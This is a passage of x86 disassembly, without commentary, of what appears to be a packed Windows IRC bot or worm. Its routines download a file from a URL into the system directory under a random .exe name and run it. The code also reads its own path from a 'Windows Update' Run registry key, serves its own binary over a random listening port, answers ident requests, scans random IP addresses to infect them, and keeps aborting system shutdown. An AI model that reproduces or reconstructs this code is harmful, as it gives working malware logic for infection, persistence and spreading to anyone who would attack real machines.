loc_3110268E: ; CODE XREF: sub_31102663+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_311010B8 ; GetSystemDirectoryA
mov edi, dword_31101090
lea eax, [ebp+var_110]
push offset asc_31105DCC ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_311010D0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31102B10
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_311010AC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31102704
push 2
jmp short loc_31102724
; ---------------------------------------------------------------------------
loc_31102704: ; CODE XREF: sub_31102663+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_3110114C ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31102727
push [ebp+var_4]
call dword_311010A4 ; CloseHandle
push 3
loc_31102724: ; CODE XREF: sub_31102663+26�j
; sub_31102663+9F�j
pop eax
jmp short loc_31102778
; ---------------------------------------------------------------------------
loc_31102727: ; CODE XREF: sub_31102663+B4�j
mov edi, 100000h
push edi
call sub_311037AE
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31101150 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_311010A8 ; WriteFile
push [ebp+var_4]
call dword_311010A4 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31102B40
push ebx
call sub_311037C2
add esp, 0Ch
xor eax, eax
loc_31102778: ; CODE XREF: sub_31102663+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_31102663 endp
; =============== S U B R O U T I N E =======================================
sub_3110277D proc near ; CODE XREF: sub_31102280+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_31105FD0
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31101114 ; strstr
mov edi, dword_311010F0
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_311027BC
and dword ptr [esi+284h], 0
loc_311027BC: ; CODE XREF: sub_3110277D+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_3110281E
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_3110281E
lea eax, [esi+180h]
push eax
call sub_31102663
test eax, eax
pop ecx
jnz short loc_3110281E
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_31101130 ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3110238E
loc_3110281E: ; CODE XREF: sub_3110277D+43�j
; sub_3110277D+55�j ...
test ebx, ebx
jz loc_31102A5C
push ebx
call dword_311010D0 ; lstrlenA
cmp eax, 0Ah
jle loc_31102A5C
mov ebp, dword_31101118
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31102A5C
and byte ptr [edi], 0
push ebx
call dword_311010D0 ; lstrlenA
cmp eax, 100h
jge loc_31102A89
push dword_31105FCC
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31101DD0
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31102A5C
and byte ptr [edi], 0
push ebx
call dword_311010D0 ; lstrlenA
cmp eax, 100h
jge loc_31102A89
push dword_31105FCC
lea eax, [esi+180h]
push ebx
push eax
call sub_31101DD0
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31101088 ; lstrcmpA
mov ebx, dword_31101094
test eax, eax
jnz loc_311029C3
lea eax, [esi+180h]
push eax
call dword_311010D0 ; lstrlenA
cmp eax, 0FFh
jge loc_311029C3
cmp dword ptr [esi+284h], 0
jnz loc_311029C3
cmp dword ptr [esi+7Ch], 0
jnz loc_311029C3
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_311029A4
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_311010D0 ; lstrlenA
cmp eax, 100h
jge loc_31102A89
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpyA
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpyA
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 64h
jle short loc_311029B1
lea eax, [esp+2DCh+var_FF]
push eax
call dword_31101104 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_311029B1
cmp ebp, 0E10h
jnb short loc_311029B1
call dword_31101128 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_311010F0 ; GetTickCount
mov [esi+74h], eax
jmp short loc_311029B1
; ---------------------------------------------------------------------------
loc_311029A4: ; CODE XREF: sub_3110277D+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpyA
loc_311029B1: ; CODE XREF: sub_3110277D+1E9�j
; sub_3110277D+1FE�j ...
lea eax, [esi+80h]
push offset asc_31105E24 ; "|"
push eax
call dword_31101090 ; lstrcatA
loc_311029C3: ; CODE XREF: sub_3110277D+15A�j
; sub_3110277D+172�j ...
mov ebp, dword_31101088
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_31102A39
lea eax, [esp+2DCh+var_2C8]
push offset dword_31105FF0
push eax
call ebx ; lstrcpyA
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31101088+4
push ds:dword_31106034
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31106030
push dword_31105FF8
push offset aDD11SD ; "%d,%d,11%s,%d"
push eax
call dword_31101130 ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3110238E
loc_31102A39: ; CODE XREF: sub_3110277D+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_31102A59
cmp [esi+284h], eax
jz short loc_31102A59
push 1
pop eax
jmp short loc_31102A8B
; ---------------------------------------------------------------------------
loc_31102A59: ; CODE XREF: sub_3110277D+2CD�j
; sub_3110277D+2D5�j
mov byte ptr [edi], 7Ch
loc_31102A5C: ; CODE XREF: sub_3110277D+A3�j
; sub_3110277D+B3�j ...
cmp dword ptr [esi+284h], 0
jnz short loc_31102A6B
cmp dword ptr [esi+7Ch], 0
jz short loc_31102A89
loc_31102A6B: ; CODE XREF: sub_3110277D+2E6�j
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31101114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31102A89
call dword_31101128 ; rand
loc_31102A89: ; CODE XREF: sub_3110277D+E2�j
; sub_3110277D+123�j ...
xor eax, eax
loc_31102A8B: ; CODE XREF: sub_3110277D+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_3110277D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102A98 proc near ; CODE XREF: sub_311014E6+8�p
; sub_31102405+57�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_311010F0 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31101108 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31102A98 endp
; =============== S U B R O U T I N E =======================================
sub_31102AC6 proc near ; CODE XREF: sub_31101C40+EA�p
; UPX0:31102E06�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_31101084 ; CreateMutexA
retn
sub_31102AC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102AD5 proc near ; CODE XREF: sub_31102E62+DB�p
; sub_31102E62+E6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_311010C8 ; CreateThread
pop ebp
retn
sub_31102AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102AEF proc near ; CODE XREF: sub_31102C74+12C�p
; sub_31102E62+C1�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_311010C8 ; CreateThread
push eax
call dword_311010A4 ; CloseHandle
pop ebp
retn
sub_31102AEF endp
; =============== S U B R O U T I N E =======================================
sub_31102B10 proc near ; CODE XREF: sub_31101E80+88�p
; sub_31101E80+155�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31102B38
loc_31102B21: ; CODE XREF: sub_31102B10+26�j
call dword_31101128 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31102B21
loc_31102B38: ; CODE XREF: sub_31102B10+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31102B10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102B40 proc near ; CODE XREF: sub_31101361+16B�p
; sub_31102663+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_311037DA ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_31101080 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_311010A4
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31102B40 endp
; =============== S U B R O U T I N E =======================================
sub_31102B96 proc near ; CODE XREF: sub_31101E80+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31101168 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_31102BB3
test esi, esi
jnz short loc_31102BC5
cmp byte ptr [edi], 30h
jz short loc_31102BCC
loc_31102BB3: ; CODE XREF: sub_31102B96+12�j
push edi
call dword_3110116C ; gethostbyname
test eax, eax
jz short loc_31102BC5
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_31102BC5: ; CODE XREF: sub_31102B96+16�j
; sub_31102B96+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_31102BCC
xor esi, esi
loc_31102BCC: ; CODE XREF: sub_31102B96+1B�j
; sub_31102B96+32�j
mov eax, esi
pop edi
pop esi
retn
sub_31102B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102BD1 proc near ; CODE XREF: sub_31103212+3E�p
; sub_311032D9+62�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31101160 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31102BF2
call dword_31101164 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31102BF2: ; CODE XREF: sub_31102BD1+15�j
lea eax, [ebp+var_34]
push eax
call dword_3110116C ; gethostbyname
test eax, eax
jnz short loc_31102C07
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31102C07: ; CODE XREF: sub_31102BD1+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31102BD1 endp
; =============== S U B R O U T I N E =======================================
sub_31102C10 proc near ; CODE XREF: sub_31102280:loc_311022BB�p
; sub_31102280+DE�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31101148 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31102C10 endp
; =============== S U B R O U T I N E =======================================
sub_31102C26 proc near ; DATA XREF: sub_31102C74+127�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
push dword_31105FFC
push dword_31105FF4
push esi
call dword_3110119C ; send
push 7D0h
call dword_311010D4 ; Sleep
push offset dword_31105FF8
call dword_3110107C ; InterlockedIncrement
push 2
push esi
call dword_3110117C ; shutdown
push esi
call dword_31101194 ; closesocket
push 0
call dword_311010BC ; ExitThread
xor eax, eax
pop esi
retn 4
sub_31102C26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102C74 proc near ; DATA XREF: sub_31102E62+E1�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31102A98
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31105FF8, ebx
call sub_31103401
add esp, 14h
test eax, eax
jnz loc_31102DA9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_311010AC ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31102CE0
push 1
call dword_311010BC ; ExitThread
loc_31102CE0: ; CODE XREF: sub_31102C74+62�j
push ebx
push esi
call dword_31101074 ; GetFileSize
push eax
mov dword_31105FFC, eax
call sub_311037AE
pop ecx
mov dword_31105FF4, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31105FFC
push eax
push esi
call dword_31101078 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31105FFC, eax
call dword_311010A4 ; CloseHandle
push ebx
push 1
push 2
call dword_31101180 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_311037DA ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31102D42: ; CODE XREF: sub_31102C74+E5�j
; sub_31102C74+ED�j ...
call dword_31101128 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_31106028, eax
jz short loc_31102D42
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31102D42
push eax
call dword_31101184 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31101188 ; bind
test eax, eax
jnz short loc_31102D42
push 64h
push edi
call dword_3110118C ; listen
mov [ebp+var_8], esi
pop esi
loc_31102D8B: ; CODE XREF: sub_31102C74+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31101190 ; accept
push eax
push offset sub_31102C26
call sub_31102AEF
pop ecx
pop ecx
jmp short loc_31102D8B
; ---------------------------------------------------------------------------
loc_31102DA9: ; CODE XREF: sub_31102C74+3D�j
push ebx
call dword_311010BC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31102C74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102DB8 proc near ; CODE XREF: sub_31102E62:loc_31102F18�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3110115C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31102DB8 endp
; ---------------------------------------------------------------------------
loc_31102DE4: ; CODE XREF: UPX1:31108378�j
push 0
call dword_311010EC ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_3110602C, eax
call dword_3110106C ; DeleteFileA
call sub_31102A98
push offset aUterm11 ; "uterm11"
call sub_31102AC6
pop ecx
mov ds:dword_31106000, eax
call dword_31101098 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31102E26
push 1
call dword_31101070 ; ExitProcess
loc_31102E26: ; CODE XREF: UPX0:31102E1C�j
call sub_31101BB8
call sub_31103565
call sub_311036D8
push offset sub_31102E62
call sub_31101C40
test eax, eax
pop ecx
jz short loc_31102E4B
push 0
call sub_31102E62
loc_31102E4B: ; CODE XREF: UPX0:31102E42�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31102E4E proc near ; CODE XREF: sub_31102280+5B�p
; sub_31102E62:loc_31102F66�p ...
push 0
push ds:dword_31106004
call dword_311010C4 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31102E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102E62 proc near ; CODE XREF: UPX0:31102E46�p
; DATA XREF: UPX0:31102E35�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_311011A8
push offset sub_31103836
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
push offset aU11x ; "u11x"
xor edi, edi
push edi
push 1
push edi
call dword_311010CC ; CreateEventA
mov ds:dword_31106004, eax
push offset aU10x ; "u10x"
push edi
push 2
call dword_31101068 ; OpenEventA
cmp eax, edi
jz short loc_31102EB4
push eax
call dword_311010C0 ; SetEvent
loc_31102EB4: ; CODE XREF: sub_31102E62+49�j
mov [ebp+var_4], edi
push offset aU8 ; "u8"
call sub_31102AC6
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_31102AC6
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_31102AC6
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31102F18
push offset aWs2_32 ; "ws2_32"
mov esi, dword_311010E0
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm11 ; "uterm11"
call sub_31102AC6
pop ecx
mov ds:dword_31106000, eax
loc_31102F18: ; CODE XREF: sub_31102E62+7B�j
call sub_31102DB8
push edi
push offset sub_31102FCD
call sub_31102AEF
pop ecx
pop ecx
push 1F4h
mov esi, dword_311010D4
call esi ; Sleep
push edi
push offset sub_31102463
call sub_31102AD5
push edi
push offset sub_31102C74
call sub_31102AD5
push edi
push offset sub_31101582
call sub_31102AD5
push edi
push offset sub_311032D9
call sub_31102AD5
add esp, 20h
loc_31102F66: ; CODE XREF: sub_31102E62+11B�j
call sub_31102E4E
test eax, eax
jnz short loc_31102F7F
push edi
call dword_31101018 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31102F66
; ---------------------------------------------------------------------------
loc_31102F7F: ; CODE XREF: sub_31102E62+10B�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31102E62 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31102F9C proc near ; CODE XREF: sub_31102FCD+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_311037E0 ; strlen
test eax, eax
pop ecx
jbe short loc_31102FCA
loc_31102FAF: ; CODE XREF: sub_31102F9C+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31102FBA
cmp al, 0Dh
jnz short loc_31102FBE
loc_31102FBA: ; CODE XREF: sub_31102F9C+18�j
and byte ptr [esi+edi], 0
loc_31102FBE: ; CODE XREF: sub_31102F9C+1C�j
push edi
inc esi
call sub_311037E0 ; strlen
cmp esi, eax
pop ecx
jb short loc_31102FAF
loc_31102FCA: ; CODE XREF: sub_31102F9C+11�j
pop edi
pop esi
retn
sub_31102F9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31102FCD proc near ; DATA XREF: sub_31102E62+BC�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_31102A98
call dword_31101128 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31102B10
lea eax, [ebp+var_48]
mov ebx, offset dword_31106008
push eax
push ebx
call sub_31103842 ; strcpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_31101180 ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31101158 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_31101184 ; ntohs
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31101188 ; bind
test eax, eax
jz short loc_31103059
push 1
pop eax
loc_31103054: ; CODE XREF: sub_31102FCD+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31103059: ; CODE XREF: sub_31102FCD+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_3110118C ; listen
test eax, eax
jz short loc_31103071
push 1
pop eax
pop edi
pop esi
jmp short loc_31103054
; ---------------------------------------------------------------------------
loc_31103071: ; CODE XREF: sub_31102FCD+9B�j
mov edi, dword_311010D4
loc_31103077: ; CODE XREF: sub_31102FCD+C6�j
; sub_31102FCD+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31101190 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31103095
push 64h
call edi ; Sleep
jmp short loc_31103077
; ---------------------------------------------------------------------------
loc_31103095: ; CODE XREF: sub_31102FCD+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_31101198 ; recv
test eax, eax
jnz short loc_311030B7
loc_311030AE: ; CODE XREF: sub_31102FCD+157�j
push esi
call dword_31101194 ; closesocket
jmp short loc_31103077
; ---------------------------------------------------------------------------
loc_311030B7: ; CODE XREF: sub_31102FCD+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31102F9C
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_3110383C ; strcat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_3110383C ; strcat
lea eax, [ebp+var_148]
push offset asc_31105E7C ; "\r\n"
push eax
call sub_3110383C ; strcat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_311037E0 ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3110119C ; send
push 1388h
call edi ; Sleep
jmp short loc_311030AE
sub_31102FCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31103126 proc near ; DATA XREF: sub_3110318A+55�o
; sub_31103212+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31103135
push 1
pop eax
jmp short locret_31103186
; ---------------------------------------------------------------------------
loc_31103135: ; CODE XREF: sub_31103126+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_3110313F: ; CODE XREF: sub_31103126+5A�j
call sub_31102E4E
test eax, eax
jnz short loc_31103182
call sub_31102C10
test eax, eax
jz short loc_31103182
cmp [ebp+var_1], bl
jz short loc_3110317B
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31101651
movzx esi, ds:word_31106038
pop ecx
call dword_31101128 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_311010D4 ; Sleep
loc_3110317B: ; CODE XREF: sub_31103126+2E�j
inc bl
cmp bl, 0FFh
jb short loc_3110313F
loc_31103182: ; CODE XREF: sub_31103126+20�j
; sub_31103126+29�j
pop esi
xor eax, eax
pop ebx
locret_31103186: ; CODE XREF: sub_31103126+D�j
leave
retn 4
sub_31103126 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3110318A proc near ; DATA XREF: sub_31103212+7E�o
; sub_311032D9+BE�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31103198
push 1
pop eax
jmp short loc_3110320E
; ---------------------------------------------------------------------------
loc_31103198: ; CODE XREF: sub_3110318A+7�j
push ebx
push esi
push edi
call sub_31102A98
mov esi, dword_31101128
xor ebx, ebx
loc_311031A8: ; CODE XREF: sub_3110318A+7D�j
call sub_31102E4E
test eax, eax
jnz short loc_31103209
call sub_31102C10
test eax, eax
jz short loc_31103209
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31106030
mov byte ptr [ebp+arg_0+3], al
call dword_3110107C ; InterlockedIncrement
push [ebp+arg_0]
call sub_31101651
test eax, eax
pop ecx
jnz short loc_311031EB
push [ebp+arg_0]
push offset sub_31103126
call sub_31102AEF
pop ecx
pop ecx
loc_311031EB: ; CODE XREF: sub_3110318A+50�j
movzx edi, ds:word_31106038
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_311010D4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_311031A8
loc_31103209: ; CODE XREF: sub_3110318A+25�j
; sub_3110318A+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_3110320E: ; CODE XREF: sub_3110318A+C�j
pop ebp
retn 4
sub_3110318A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31103212 proc near ; DATA XREF: sub_311032D9+D6�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31102A98
call sub_31102E4E
test eax, eax
jnz loc_311032CB
push ebx
mov ebx, dword_311010D4
push esi
mov esi, dword_31101128
push edi
loc_31103238: ; CODE XREF: sub_31103212+48�j
; sub_31103212+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31103247: ; CODE XREF: sub_31103212+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31103247
call sub_31102BD1
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31103238
call sub_31102C10
test eax, eax
jz short loc_311032A3
push offset dword_31106030
call dword_3110107C ; InterlockedIncrement
push edi
call sub_31101651
test eax, eax
pop ecx
jnz short loc_311032AA
push edi
push offset sub_31103126
call sub_31102AEF
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3110328F: ; CODE XREF: sub_31103212+8D�j
push edi
push offset sub_3110318A
call sub_31102AEF
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3110328F
jmp short loc_311032AA
; ---------------------------------------------------------------------------
loc_311032A3: ; CODE XREF: sub_31103212+51�j
push 2710h
call ebx ; Sleep
loc_311032AA: ; CODE XREF: sub_31103212+67�j
; sub_31103212+8F�j
movzx edi, ds:word_31106038
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31102E4E
test eax, eax
jz loc_31103238
pop edi
pop esi
pop ebx
loc_311032CB: ; CODE XREF: sub_31103212+11�j
push 0
call dword_311010BC ; ExitThread
xor eax, eax
leave
retn 4
sub_31103212 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
